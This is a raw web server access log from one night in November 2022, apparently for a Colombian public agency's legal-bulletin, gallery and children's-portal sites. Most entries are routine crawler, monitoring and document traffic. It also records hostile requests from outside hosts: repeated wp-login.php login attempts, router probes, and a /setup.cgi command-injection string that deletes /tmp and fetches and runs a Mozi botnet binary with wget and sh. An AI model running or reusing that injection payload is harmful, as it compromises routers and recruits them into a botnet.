190.242.24.39 - - [04/Nov/2022:01:46:32 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.242.24.39 - - [04/Nov/2022:01:46:32 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [04/Nov/2022:01:44:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54823
201.245.192.253 - - [04/Nov/2022:01:50:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:01:49:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:01:50:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
172.22.2.4 - - [04/Nov/2022:01:53:03 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20No.%200001%20del%2011%20de%20junio%20de%202019.pdf HTTP/1.1" 200 228190
93.158.161.71 - - [04/Nov/2022:01:53:09 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:01:55:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:01:57:04 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [04/Nov/2022:01:57:04 -0500] "GET /BLA/boletinlegal/ab2h HTTP/1.1" 404 1018
172.22.2.4 - - [04/Nov/2022:01:55:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:01:57:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [04/Nov/2022:01:56:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50046
216.245.221.92 - - [04/Nov/2022:01:58:29 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:02:00:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
77.88.5.209 - - [04/Nov/2022:02:03:09 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:02:01:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Nov/2022:02:03:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:02:02:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [04/Nov/2022:02:05:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:02:05:04 -0500] "GET /BLA/boletinlegal/index.php/js/jquery.scrollto-min.js HTTP/1.1" 200 62772
216.245.221.92 - - [04/Nov/2022:02:08:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:02:07:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:02:08:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [04/Nov/2022:02:10:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
93.158.161.48 - - [04/Nov/2022:02:13:09 -0500] "-" 408 -
216.245.221.92 - - [04/Nov/2022:02:13:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:02:12:23 -0500] "GET /BLA/boletinlegal/index.php/js/jquery.scrollshow.js HTTP/1.1" 200 57375
40.77.167.3 - - [04/Nov/2022:02:14:12 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12504
172.22.2.4 - - [04/Nov/2022:02:13:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.102.43.119 - - [04/Nov/2022:02:15:12 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1/W28gNIZSbPWN0Fqxsp3L5EniYAVbZB3Q84AryoWu+1piJPiS3CMoxTSRgbWsn6pO97CamM+dMyz8w1PA/F8mM5Mrp2LRGn3p5hqy9TZU1nJwcGxXJs/J3ccOZi7qIsNz5XqnZRI6O0w==&u=U2FsdGVkX1/nSPnpvQc4MH52LN7tShGvrrJUkrUYxs6+cOvMgqEWpPWVKTegYgdn&y=U2FsdGVkX19oFDNXGhlppOocvfjE9SsbMBgs5oLcf0xsWoA65+ZfBntuJQrQgvNV HTTP/1.1" 200 60
201.245.192.253 - - [04/Nov/2022:02:15:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:02:14:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [04/Nov/2022:02:18:29 -0500] "HEAD / HTTP/1.1" 200 -
186.102.43.119 - - [04/Nov/2022:02:19:31 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/HRWipin8kZgI1GKI3NMdhbtrPIZPsF/hEEw5JPb5kknZRiFE28PJR&y=U2FsdGVkX1+4iNq+hhvLCncmOVt/bnbOyHOcJ8hCazkfnJaFlC7U7yoWcMsh56wO HTTP/1.1" 200 30
186.102.43.119 - - [04/Nov/2022:02:19:31 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1++JSyYIMB642mXp4x8jkNdJ1OcU1s0g69wiheVKqfNjblqPSnwB3NUvlakkwqf3oFpco89YFzgPbu9SrDRAXXGRabqA1UmuPo=&u=U2FsdGVkX19eiVxZmNhtoOUtnPa3dCTXxT8yXxvlnWLgzB6NQuH0pwqliZtUDRlB&y=U2FsdGVkX1+4iNq+hhvLCncmOVt/bnbOyHOcJ8hCazkfnJaFlC7U7yoWcMsh56wO HTTP/1.1" 200 97
186.102.43.119 - - [04/Nov/2022:02:19:31 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+u2RvS4Km/NHX7ROyimeH+ZRqm1yQIi/VFteZdQWY1qHXOFhOLUoI5fKrCWmyqjLNvTko3qQfJ7141p1EPJb4Ebe/WCdxblWpttX9ozPITgxpMPGpHlopYVfaSiiurveokNT5Ar0mzLjTL228vc2W6IHqbHVj8c4ph/WAtXmx9mOV18oVrWfzPjeDNNCxbQRxg5sZRNUfX69urqwZsGjC810KYU3vDEmHkSF6wJTV9nIfpeBYbFITXP+NoFLz2h6YwHYaJlamMAm7JjWUqgA+piONiNPJ5y3pOyCgzVXe5XIfeNDgxYcmgukGDxrmBZ8u2pp3YSVwWyqLSAJhl6HYCPBliMXzAtLUPS7sbs3G8FkE+OZ9bwWk6fQGn9D2Rf7wJk147vfWSI6WQc+MsATGQS36YjzNW2YqzixB/6KqeiwDyxRqFRss8E+nvlPePo5NjDvdIXHIB+mp6wIr8ETr130x+04Hj22XG1E2d4QQsTJ+cHdLB3phsxUiNJlu/5WCuiLmLDz8hi7v0xkoxwrmdB5nqPMq+sZJZvj4g9WPYE9x1dmHTtHrqY3vfNxieg3QkSmCyN4HqULyPCM8zKfhbcGEC9sn814u/+ge7x9kuNTeuNyJBuPXhNxfAKCHUT6KBjtBYCVOQZbxcV4iQfFyhMRmHvzUJC/3CbYbFVx5enqNw92/K2i5VhU+5SWKKZvpRRrOfy94I6Dis2SaaveU7+WmgDMXiyoXL7+0H+rwd0vtA1rVZy7FkbmgLQuPvPk0SmzkVi0OrU6/LutyrsSsFe1/SvZOGwBa+lJ9L16zB+BhYc2XbY4PUDcujJDOPobAJy+GiV1+NpxCgdMGMIyB2xy1R5eUP7K7/reWJQvyyd+H8bHuzEFvNEU/0Mr0fRE553ZRPVqwZdwmDvhPRc09O8JmTqkGJyB89tlfM31G1/nQjZNxxMXX7WegLDdH7ZOBn9EdsRFu5en5LTX+6CmCpN+o0GSU4wtfKhwl/Nz+mTSLjHS3G4RLBsh1t8/1mBTkyGaSu5htOVdni+mk9750G4nlCCEZ+JKEKAPQwaYWMoittXMkp+rzUdlwCUhRwiv6RXMxIDtlq8NWUSQlwtDMe2rZF4Sl8GEPlI7foLFkacLdus6n9Equ6OvdKRiYt404m6u/itV9pv73+GlS/nIKOer4uHQz+9MBFI1tZcMURP2qjVMK6Xe4fWE8LWxEOsydsryetgSId8iqWaOlhjkuvPcVkg12x/MXukv3hgFdu7M0DhGCPk9UOkSNM1NRcwo3ww2xRZLYsSs+avz2s83nah+7q3K0g8W5FGoh1B3FXLxBqnevQtLGX4TC1W9vjcoEnH2i4WF4d95H43F5ykqkbR364Bu4yOCVKKOMspcs5qYv+U9GmI0/CqxZe/Umz6PiN/KoM3HlmyJzbz2FYgnTcJgXn/7l6wz8=&u=U2FsdGVkX19eiVxZmNhtoOUtnPa3dCTXxT8yXxvlnWLgzB6NQuH0pwqliZtUDRlB&y=U2FsdGVkX1+4iNq+hhvLCncmOVt/bnbOyHOcJ8hCazkfnJaFlC7U7yoWcMsh56wO HTTP/1.1" 200 2864
186.102.43.119 - - [04/Nov/2022:02:19:31 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+U45EznLfKjKRa3cHGjyD68qiWPFcCSvigrvVe/UW1EiS/7zEFv2y9Eo0iCFKVksQxaD9MSo82KjXZmScrJ1kVXfr3AFscppO/3uMmycztH7emECltzyoiTgeFAcri59sYO1IRuFW0bzvQeTk9HXWC7kts2uihEtjnDSg75qbDFCAh3imgciMqLR3Eicd5CxmQ7/6hqYk4dlIt0me4ycYHOJJfHVwfUqarVZnaBvP2p6+vb44KwAYQDqcqay5Bi1VnP7mREBxTCYHHzXkL4WCFKMubr9L71BH63z2fwracLjo4iDNqbkHOdO8XBPkMXVLfuT6o77Y2g9rZfoHUERftTStnwG/fXbk=&u=U2FsdGVkX19eiVxZmNhtoOUtnPa3dCTXxT8yXxvlnWLgzB6NQuH0pwqliZtUDRlB&y=U2FsdGVkX1+4iNq+hhvLCncmOVt/bnbOyHOcJ8hCazkfnJaFlC7U7yoWcMsh56wO HTTP/1.1" 200 196
186.102.43.119 - - [04/Nov/2022:02:19:31 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/HRWipin8kZgI1GKI3NMdhbtrPIZPsF/hEEw5JPb5kknZRiFE28PJR HTTP/1.1" 200 30992
201.245.192.253 - - [04/Nov/2022:02:20:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:02:19:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:02:21:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39618
201.245.192.253 - - [04/Nov/2022:02:21:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43671
172.22.2.4 - - [04/Nov/2022:02:19:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
77.88.5.83 - - [04/Nov/2022:02:23:09 -0500] "-" 408 -
216.245.221.92 - - [04/Nov/2022:02:23:29 -0500] "HEAD / HTTP/1.1" 200 -
193.142.146.35 - - [04/Nov/2022:02:25:22 -0500] "GET / HTTP/1.1" 200 319
193.142.146.35 - - [04/Nov/2022:02:25:22 -0500] "POST /HNAP1/ HTTP/1.1" 404 1018
201.245.192.253 - - [04/Nov/2022:02:25:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:02:24:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:02:25:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [04/Nov/2022:02:28:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:02:28:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [04/Nov/2022:02:30:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
201.245.192.253 - - [04/Nov/2022:02:31:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39618
201.245.192.253 - - [04/Nov/2022:02:31:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43671
172.22.2.4 - - [04/Nov/2022:02:30:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
77.88.5.3 - - [04/Nov/2022:02:33:09 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:02:31:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
216.245.221.92 - - [04/Nov/2022:02:33:29 -0500] "HEAD / HTTP/1.1" 200 -
101.200.154.185 - - [04/Nov/2022:02:33:26 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Tierra-escenario.jpg HTTP/1.1" 200 181491
201.245.192.253 - - [04/Nov/2022:02:35:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:02:36:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Nov/2022:02:38:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:02:37:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [04/Nov/2022:02:40:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
201.245.192.253 - - [04/Nov/2022:02:41:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39618
201.245.192.253 - - [04/Nov/2022:02:41:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43671
77.88.5.37 - - [04/Nov/2022:02:43:09 -0500] "-" 408 -
216.245.221.92 - - [04/Nov/2022:02:43:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:02:42:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.97 - - [04/Nov/2022:02:44:15 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [04/Nov/2022:02:44:16 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [04/Nov/2022:02:43:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
201.245.192.253 - - [04/Nov/2022:02:45:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
45.41.241.65 - - [04/Nov/2022:02:46:14 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
216.245.221.92 - - [04/Nov/2022:02:48:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:02:48:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:02:50:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:02:49:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
77.88.5.246 - - [04/Nov/2022:02:53:09 -0500] "-" 408 -
216.245.221.92 - - [04/Nov/2022:02:53:29 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:02:55:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
185.119.81.103 - - [04/Nov/2022:02:55:36 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [04/Nov/2022:02:55:37 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [04/Nov/2022:02:54:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:02:54:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
93.158.161.72 - - [04/Nov/2022:02:57:35 -0500] "-" 408 -
77.88.5.232 - - [04/Nov/2022:02:57:40 -0500] "-" 408 -
93.158.161.29 - - [04/Nov/2022:02:57:45 -0500] "-" 408 -
77.88.5.27 - - [04/Nov/2022:02:57:50 -0500] "-" 408 -
40.77.167.57 - - [04/Nov/2022:02:57:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 330037
77.88.5.249 - - [04/Nov/2022:02:58:06 -0500] "-" 408 -
77.88.5.49 - - [04/Nov/2022:02:58:20 -0500] "-" 408 -
216.245.221.92 - - [04/Nov/2022:02:58:29 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.82 - - [04/Nov/2022:02:58:50 -0500] "-" 408 -
77.88.5.5 - - [04/Nov/2022:02:59:51 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:03:00:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
93.158.161.50 - - [04/Nov/2022:03:00:50 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:02:59:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:03:00:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
64.124.8.35 - - [04/Nov/2022:03:02:32 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/infograf%C3%ADa-ruido_optimized.jpg HTTP/1.1" 200 268472
77.88.5.214 - - [04/Nov/2022:03:02:50 -0500] "-" 408 -
216.245.221.92 - - [04/Nov/2022:03:03:29 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:03:05:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
77.88.5.162 - - [04/Nov/2022:03:05:50 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:03:05:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:03:06:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
172.22.2.4 - - [04/Nov/2022:03:07:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
216.245.221.92 - - [04/Nov/2022:03:08:29 -0500] "HEAD / HTTP/1.1" 200 -
106.75.80.236 - - [04/Nov/2022:03:10:19 -0500] "GET / HTTP/1.0" 200 319
201.245.192.253 - - [04/Nov/2022:03:10:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
77.88.5.10 - - [04/Nov/2022:03:10:50 -0500] "-" 408 -
185.119.81.103 - - [04/Nov/2022:03:12:29 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [04/Nov/2022:03:12:30 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [04/Nov/2022:03:11:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Nov/2022:03:13:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:03:12:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [04/Nov/2022:03:15:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:03:15:33 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2014%20del%2011%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 3427471
172.22.2.4 - - [04/Nov/2022:03:15:54 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [04/Nov/2022:03:15:54 -0500] "GET /BLA/boletinlegal/ab2h HTTP/1.1" 404 1018
172.22.2.4 - - [04/Nov/2022:03:15:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [04/Nov/2022:03:18:29 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.221 - - [04/Nov/2022:03:18:50 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:03:17:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:03:18:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58575
201.245.192.253 - - [04/Nov/2022:03:20:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
39.105.116.247 - - [04/Nov/2022:03:20:30 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera3P.jpg HTTP/1.1" 200 31355
201.245.192.253 - - [04/Nov/2022:03:21:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39776
201.245.192.253 - - [04/Nov/2022:03:21:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43658
216.245.221.92 - - [04/Nov/2022:03:23:29 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.66 - - [04/Nov/2022:03:24:24 -0500] "GET /forest/ HTTP/1.1" 200 12041
172.22.2.4 - - [04/Nov/2022:03:23:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:03:25:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:03:24:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
64.124.8.35 - - [04/Nov/2022:03:26:07 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/infograf%C3%ADa-ruido_optimized.jpg HTTP/1.1" 200 268472
216.245.221.92 - - [04/Nov/2022:03:28:29 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.167 - - [04/Nov/2022:03:28:50 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:03:30:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:03:29:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:03:31:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39776
201.245.192.253 - - [04/Nov/2022:03:31:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43658
172.22.2.4 - - [04/Nov/2022:03:29:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [04/Nov/2022:03:33:29 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.103 - - [04/Nov/2022:03:34:08 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [04/Nov/2022:03:34:09 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
185.119.81.102 - - [04/Nov/2022:03:35:20 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [04/Nov/2022:03:35:21 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [04/Nov/2022:03:35:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:03:34:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.180.143.18 - - [04/Nov/2022:03:36:38 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
172.22.2.4 - - [04/Nov/2022:03:35:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
185.119.81.102 - - [04/Nov/2022:03:38:14 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [04/Nov/2022:03:38:15 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [04/Nov/2022:03:38:29 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.29 - - [04/Nov/2022:03:38:50 -0500] "-" 408 -
40.77.167.46 - - [04/Nov/2022:03:39:20 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12504
201.245.192.253 - - [04/Nov/2022:03:40:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
201.245.192.253 - - [04/Nov/2022:03:41:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39776
201.245.192.253 - - [04/Nov/2022:03:41:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43658
172.22.2.4 - - [04/Nov/2022:03:40:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
39.106.54.67 - - [04/Nov/2022:03:43:08 -0500] "GET /galeria/galeria/fotos/juan-amarillo2P.jpg HTTP/1.1" 200 32696
172.22.2.4 - - [04/Nov/2022:03:41:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [04/Nov/2022:03:43:29 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.85 - - [04/Nov/2022:03:44:30 -0500] "-" 408 -
39.144.7.178 - - [04/Nov/2022:03:45:19 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
201.245.192.253 - - [04/Nov/2022:03:45:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:03:46:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Nov/2022:03:48:29 -0500] "HEAD / HTTP/1.1" 200 -
93.158.161.36 - - [04/Nov/2022:03:48:50 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:03:47:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [04/Nov/2022:03:50:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
185.119.81.103 - - [04/Nov/2022:03:51:31 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [04/Nov/2022:03:51:32 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [04/Nov/2022:03:53:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:03:52:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:03:53:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [04/Nov/2022:03:55:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:03:57:51 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2002%20del%2019%20de%20Abril%20de%202016.pdf HTTP/1.1" 304 -
216.245.221.92 - - [04/Nov/2022:03:58:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:03:58:39 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
93.158.161.41 - - [04/Nov/2022:03:58:50 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:03:58:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.103 - - [04/Nov/2022:04:00:08 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [04/Nov/2022:04:00:09 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [04/Nov/2022:04:00:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:03:59:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
40.77.167.57 - - [04/Nov/2022:04:00:47 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [04/Nov/2022:04:02:04 -0500] "GET /BLA/boletinlegal/explore HTTP/1.1" 404 1018
216.245.221.92 - - [04/Nov/2022:04:03:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:04:03:41 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20C-222%20DE%202011.doc HTTP/1.1" 304 -
201.245.192.253 - - [04/Nov/2022:04:05:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
172.22.2.4 - - [04/Nov/2022:04:04:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.103 - - [04/Nov/2022:04:05:58 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [04/Nov/2022:04:05:59 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [04/Nov/2022:04:06:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
64.62.197.96 - - [04/Nov/2022:04:06:32 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [04/Nov/2022:04:04:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
157.55.39.15 - - [04/Nov/2022:04:06:43 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
185.119.81.103 - - [04/Nov/2022:04:07:03 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [04/Nov/2022:04:07:04 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [04/Nov/2022:04:07:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [04/Nov/2022:04:08:28 -0500] "HEAD / HTTP/1.1" 200 -
